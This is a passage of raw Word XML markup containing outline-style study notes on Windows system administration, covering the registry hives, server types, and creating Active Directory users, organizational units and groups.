          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Windows Terminal – can be used instead of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and command line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41110BAF" w14:textId="54821E16" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Registry Editor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2088AC39" w14:textId="4B197C55" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Contains low level settings for Microsoft Windows settings and applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC3A677" w14:textId="1A282470" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HKEY CLASSES ROOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A8CA5" w14:textId="786B5644" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HKEY CURRENT USER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D955F4" w14:textId="1AC939F2" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HKEY LOCAL MACHINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C0C3FF" w14:textId="3EE48E2E" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HKEY USERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612F4257" w14:textId="5C6C3930" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HKEY CURRENT CONFIG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDABCAE" w14:textId="3078DDE7" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Can be browsed via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27E5A5EF" w14:textId="3C176945" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Syntax – cd &lt;REG DB&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692E5022" w14:textId="25751808" w:rsidR="002A5E83" w:rsidRPr="0084205E" w:rsidRDefault="002A5E83" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Windows also has </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>builtin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> tool named “reg” that can be used from command line to add, remove, query, import, export, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> registry keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1827BA42" w14:textId="20713711" w:rsidR="000F3D70" w:rsidRPr="0084205E" w:rsidRDefault="000F3D70" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Regedit for GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325A3EEC" w14:textId="2902D65F" w:rsidR="000F3D70" w:rsidRPr="0084205E" w:rsidRDefault="000F3D70" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Types of Servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE6D52C" w14:textId="3835E138" w:rsidR="000F3D70" w:rsidRPr="0084205E" w:rsidRDefault="000F3D70" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Domain Controller – important for AD and AAD infrastructure – control users, groups, restrict actions, improve security, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B1BBB0E" w14:textId="24996788" w:rsidR="000F3D70" w:rsidRPr="0084205E" w:rsidRDefault="000F3D70" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File Server – great for file sharing over network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000CC433" w14:textId="0E600B56" w:rsidR="000F3D70" w:rsidRPr="0084205E" w:rsidRDefault="000F3D70" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Web Server – serves static or dynamic content to a web browser by loading file from a disk and serving it across the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0EFF8E" w14:textId="0028E6BC" w:rsidR="000F3D70" w:rsidRPr="0084205E" w:rsidRDefault="000F3D70" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>FTP Server – move files securely between computers while providing file security and organization as well as transfer control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D8247A" w14:textId="1C9BA785" w:rsidR="000F3D70" w:rsidRPr="0084205E" w:rsidRDefault="000F3D70" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mail Server – move and store mail over corporate networks (LANs and WANs) and across internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBEAED6" w14:textId="7D8FF418" w:rsidR="000F3D70" w:rsidRPr="0084205E" w:rsidRDefault="000F3D70" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Database Server – provides other computers with services related to accessing and retrieving data from one or multiple databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C8B86" w14:textId="2EDCD888" w:rsidR="000F3D70" w:rsidRPr="0084205E" w:rsidRDefault="000F3D70" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Proxy Server – sits between client program and external server to filter requests, improve performance, and share connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD0008" w14:textId="190C2240" w:rsidR="000F3D70" w:rsidRPr="0084205E" w:rsidRDefault="000F3D70" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Application Server – connected between database servers and users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018AACF9" w14:textId="5B49D0DF" w:rsidR="000F3D70" w:rsidRPr="0084205E" w:rsidRDefault="000F3D70" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Users and Group Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DEE9C2" w14:textId="69DB458A" w:rsidR="00C71D33" w:rsidRPr="0084205E" w:rsidRDefault="00C71D33" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Active Directory user management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C07C1A9" w14:textId="57D2BEB4" w:rsidR="00C71D33" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Tools &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00C71D33" w:rsidRPr="0084205E">
        <w:t>Active Directory Users and Computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEAE285" w14:textId="2C42C64E" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>View &gt; Advanced Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BE7149" w14:textId="36ECDF40" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Create an OU to store users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383D6734" w14:textId="4E07A928" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Right click domain name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F132CF" w14:textId="410D0DA3" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>New &gt; Organizational Unit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD0F052" w14:textId="6A40987B" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Name and OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B269B59" w14:textId="02D230E5" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Create two additional OUs inside newly created OU (nesting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3E7F3C" w14:textId="1AF4FB26" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Right click on new OU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43539495" w14:textId="58FA6732" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>New &gt; Organizational Unit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1955C926" w14:textId="35CA3476" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Name and ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294B53DF" w14:textId="65B7268E" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Repeat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4F084D" w14:textId="1C1156CE" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Create users and groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603BD04F" w14:textId="0C310A27" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Right click Users OU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F2A59" w14:textId="57C74709" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>New &gt; User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FD09E0" w14:textId="5278379D" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Fill in information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FA70ED" w14:textId="06E820DF" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Login name is User Logon Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44739D27" w14:textId="1FF2477C" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D1B774" w14:textId="6A147C05" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Create password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE6A907" w14:textId="06C3F8C7" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Select appropriate password options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272B9A2D" w14:textId="7AFCDE5C" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Account disabling is also an option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EB56AC" w14:textId="37208ECB" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BACB02" w14:textId="689FB88F" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3703592D" w14:textId="2312021E" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Right Click OU &gt; New &gt; Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E80FE5" w14:textId="13352B20" w:rsidR="000C69ED" w:rsidRPr="0084205E" w:rsidRDefault="000C69ED" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Name &gt; OK</w:t>
